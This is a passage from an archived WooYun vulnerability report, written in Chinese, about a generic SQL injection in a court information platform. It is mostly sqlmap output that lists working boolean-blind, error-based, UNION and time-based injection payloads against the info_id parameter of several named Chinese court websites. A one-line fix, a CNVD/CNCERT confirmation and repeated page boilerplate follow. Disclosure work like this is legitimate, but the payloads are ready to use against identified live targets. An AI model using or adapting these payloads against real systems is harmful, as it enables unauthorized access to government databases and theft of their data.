    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: info_id=XFLOW000020201105' AND 1197=1197 AND 'GqXa'='GqXa
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: info_id=XFLOW000020201105' AND 6917=CONVERT(INT,(CHAR(58)+CHAR(105)
+CHAR(120)+CHAR(112)+CHAR(58)+(SELECT (CASE WHEN (6917=6917) THEN CHAR(49) ELSE
CHAR(48) END))+CHAR(58)+CHAR(109)+CHAR(118)+CHAR(103)+CHAR(58))) AND 'DIoR'='DIo
R
    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: info_id=-1609' UNION ALL SELECT NULL,NULL,CHAR(58)+CHAR(105)+CHAR(1
20)+CHAR(112)+CHAR(58)+CHAR(67)+CHAR(66)+CHAR(76)+CHAR(103)+CHAR(118)+CHAR(113)+
CHAR(112)+CHAR(71)+CHAR(76)+CHAR(89)+CHAR(58)+CHAR(109)+CHAR(118)+CHAR(103)+CHAR
(58),NULL,NULL,NULL,NULL--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: info_id=XFLOW000020201105' WAITFOR DELAY '0:0:5'--
---
#8：http://www.syzy.gov.cn/sfpt/channel/showDetail.jsp?info_id=SFDTP000001201503000651
Place: GET
Parameter: info_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: info_id=SFDTP000001201503000651' AND 4899=4899 AND 'NiHn'='NiHn
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: info_id=SFDTP000001201503000651' AND 8619=CONVERT(INT,(CHAR(58)+CHA
R(110)+CHAR(110)+CHAR(107)+CHAR(58)+(SELECT (CASE WHEN (8619=8619) THEN CHAR(49)
 ELSE CHAR(48) END))+CHAR(58)+CHAR(109)+CHAR(103)+CHAR(110)+CHAR(58))) AND 'ZKfX
'='ZKfX
    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: info_id=SFDTP000001201503000651' UNION ALL SELECT NULL,NULL,NULL,NU
LL,NULL,CHAR(58)+CHAR(110)+CHAR(110)+CHAR(107)+CHAR(58)+CHAR(122)+CHAR(115)+CHAR
(80)+CHAR(116)+CHAR(103)+CHAR(84)+CHAR(76)+CHAR(102)+CHAR(77)+CHAR(87)+CHAR(58)+
CHAR(109)+CHAR(103)+CHAR(110)+CHAR(58),NULL--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: info_id=SFDTP000001201503000651' WAITFOR DELAY '0:0:5'--
---
#9：http://sfpt.hkfy.gov.cn/sfpt/channel/showDetail.jsp?info_id=SFDTP000762201504000609
Place: GET
Parameter: info_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: info_id=SFDTP000762201504000609' AND 5622=5622 AND 'fGgY'='fGgY
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: info_id=SFDTP000762201504000609' AND 1174=CONVERT(INT,(SELECT CHAR(113)+CHAR(97)+CHAR(107)+CHAR(109)+CHAR(113)+(SELECT (CASE WHEN (1174=1174) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(98)+CHAR(119)+CHAR(113))) AND 'szbV'='szbV
    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: info_id=-8808' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(97)+CHAR(107)+CHAR(109)+CHAR(113)+CHAR(73)+CHAR(70)+CHAR(80)+CHAR(84)+CHAR(84)+CHAR(68)+CHAR(118)+CHAR(106)+CHAR(98)+CHAR(88)+CHAR(113)+CHAR(122)+CHAR(98)+CHAR(119)+CHAR(113),NULL-- 
---
#10：http://www.baishafayuan.gov.cn/sfpt/channel/showDetail.jsp?info_id=XFLOW000023201105
Place: GET
Parameter: info_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: info_id=XFLOW000023201105' AND 8000=8000 AND 'CNUK'='CNUK
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: info_id=XFLOW000023201105' AND 4613=CONVERT(INT,(CHAR(58)+CHAR(105)
+CHAR(97)+CHAR(101)+CHAR(58)+(SELECT (CASE WHEN (4613=4613) THEN CHAR(49) ELSE C
HAR(48) END))+CHAR(58)+CHAR(117)+CHAR(101)+CHAR(101)+CHAR(58))) AND 'jetN'='jetN
    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: info_id=-5114' UNION ALL SELECT NULL,NULL,CHAR(58)+CHAR(105)+CHAR(9
7)+CHAR(101)+CHAR(58)+CHAR(68)+CHAR(122)+CHAR(81)+CHAR(82)+CHAR(65)+CHAR(89)+CHA
R(118)+CHAR(73)+CHAR(116)+CHAR(107)+CHAR(58)+CHAR(117)+CHAR(101)+CHAR(101)+CHAR(
58),NULL,NULL,NULL,NULL--
---
#11：http://www.wzsfy.gov.cn/sfpt/channel/showDetail.jsp?info_id=XFLOW000027201105
Place: GET
Parameter: info_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: info_id=XFLOW000027201105' AND 3260=3260 AND 'umkV'='umkV
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: info_id=XFLOW000027201105' AND 7974=CONVERT(INT,(CHAR(58)+CHAR(122)
+CHAR(106)+CHAR(118)+CHAR(58)+(SELECT (CASE WHEN (7974=7974) THEN CHAR(49) ELSE
CHAR(48) END))+CHAR(58)+CHAR(108)+CHAR(114)+CHAR(116)+CHAR(58))) AND 'TxVi'='TxV
i
    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: info_id=XFLOW000027201105' UNION ALL SELECT NULL,NULL,NULL,NULL,NUL
L,CHAR(58)+CHAR(122)+CHAR(106)+CHAR(118)+CHAR(58)+CHAR(118)+CHAR(104)+CHAR(113)+
CHAR(115)+CHAR(74)+CHAR(81)+CHAR(85)+CHAR(67)+CHAR(115)+CHAR(67)+CHAR(58)+CHAR(1
08)+CHAR(114)+CHAR(116)+CHAR(58),NULL--
    Type: AND/OR time-based blind
    Title: PostgreSQL > 8.1 AND time-based blind
    Payload: info_id=XFLOW000027201105' AND 7232=(SELECT 7232 FROM PG_SLEEP(5))
AND 'ZuUq'='ZuUq
---
#12：http://www.dongfangfayuan.gov.cn/sfpt/channel/showDetail.jsp?info_id=XFLOW000023201105
Place: GET
Parameter: info_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: info_id=XFLOW000023201105' AND 4256=4256 AND 'aBMu'='aBMu
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: info_id=XFLOW000023201105' AND 3202=CONVERT(INT,(CHAR(58)+CHAR(104)
+CHAR(119)+CHAR(99)+CHAR(58)+(SELECT (CASE WHEN (3202=3202) THEN CHAR(49) ELSE C
HAR(48) END))+CHAR(58)+CHAR(109)+CHAR(99)+CHAR(103)+CHAR(58))) AND 'whgB'='whgB
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: info_id=XFLOW000023201105' WAITFOR DELAY '0:0:5'--
---
#13：http://www.ypfy.gov.cn/sfpt/channel/showDetail.jsp?info_id=XFLOW000023201105
Place: GET
Parameter: info_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: info_id=XFLOW000023201105' AND 9147=9147 AND 'kicL'='kicL
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: info_id=XFLOW000023201105' AND 7570=CONVERT(INT,(CHAR(58)+CHAR(117)
+CHAR(122)+CHAR(100)+CHAR(58)+(SELECT (CASE WHEN (7570=7570) THEN CHAR(49) ELSE
CHAR(48) END))+CHAR(58)+CHAR(118)+CHAR(104)+CHAR(104)+CHAR(58))) AND 'nvaU'='nva
U
    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: info_id=-9483' UNION ALL SELECT NULL,NULL,CHAR(58)+CHAR(117)+CHAR(1
22)+CHAR(100)+CHAR(58)+CHAR(100)+CHAR(65)+CHAR(81)+CHAR(82)+CHAR(115)+CHAR(70)+C
HAR(103)+CHAR(110)+CHAR(73)+CHAR(114)+CHAR(58)+CHAR(118)+CHAR(104)+CHAR(104)+CHA
R(58),NULL,NULL,NULL,NULL--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: info_id=XFLOW000023201105' WAITFOR DELAY '0:0:5'--
---
#14：http://www.chengmaifayuan.gov.cn/sfpt/channel/showDetail.jsp?info_id=SFDTP000001201501000623
Place: GET
Parameter: info_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: info_id=SFDTP000001201501000623' AND 2766=2766 AND 'yzBo'='yzBo
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: info_id=SFDTP000001201501000623' AND 1048=CONVERT(INT,(CHAR(58)+CHA
R(113)+CHAR(122)+CHAR(114)+CHAR(58)+(SELECT (CASE WHEN (1048=1048) THEN CHAR(49)
 ELSE CHAR(48) END))+CHAR(58)+CHAR(109)+CHAR(107)+CHAR(107)+CHAR(58))) AND 'ouIj
'='ouIj
    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: info_id=-1668' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CHAR(58)+C
HAR(113)+CHAR(122)+CHAR(114)+CHAR(58)+CHAR(72)+CHAR(76)+CHAR(105)+CHAR(68)+CHAR(
86)+CHAR(118)+CHAR(88)+CHAR(83)+CHAR(110)+CHAR(97)+CHAR(58)+CHAR(109)+CHAR(107)+
CHAR(107)+CHAR(58),NULL--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: info_id=SFDTP000001201501000623' WAITFOR DELAY '0:0:5'--
---
#15：http://112.67.253.202/sfpt/channel/showDetail.jsp?info_id=SFDTP000001201407000583
Place: GET
Parameter: info_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: info_id=SFDTP000001201407000583' AND 6259=6259 AND 'XMNE'='XMNE
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: info_id=SFDTP000001201407000583' AND 1970=CONVERT(INT,(CHAR(58)+CHA
R(108)+CHAR(104)+CHAR(116)+CHAR(58)+(SELECT (CASE WHEN (1970=1970) THEN CHAR(49)
 ELSE CHAR(48) END))+CHAR(58)+CHAR(114)+CHAR(102)+CHAR(122)+CHAR(58))) AND 'VPKc
'='VPKc
    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: info_id=-2453' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CHAR(58)+C
HAR(108)+CHAR(104)+CHAR(116)+CHAR(58)+CHAR(100)+CHAR(79)+CHAR(82)+CHAR(98)+CHAR(
75)+CHAR(102)+CHAR(103)+CHAR(121)+CHAR(75)+CHAR(113)+CHAR(58)+CHAR(114)+CHAR(102
)+CHAR(122)+CHAR(58),NULL--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: info_id=SFDTP000001201407000583' WAITFOR DELAY '0:0:5'--
---

修复方案：

禁止字符串拼接。。

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：13

确认时间：2015-05-19 08:15

厂商回复：

CNVD确认并复现所述情况,暂未确认软件生产厂商已经转由CNCERT下发给海南分中心,由其后续协调网站案例单位处置.

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0113942

漏洞标题：某在用法院系统通用型注入

相关厂商：国家互联网应急中心

漏洞作者：路人甲

提交时间：2015-05-14 10:13

修复时间：2015-08-17 08:16

公开时间：2015-08-17 08:16

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：18

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0113942

漏洞标题：某在用法院系统通用型注入

相关厂商：国家互联网应急中心

漏洞作者： 路人甲

提交时间：2015-05-14 10:13

修复时间：2015-08-17 08:16

公开时间：2015-08-17 08:16

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：18

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0113942"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云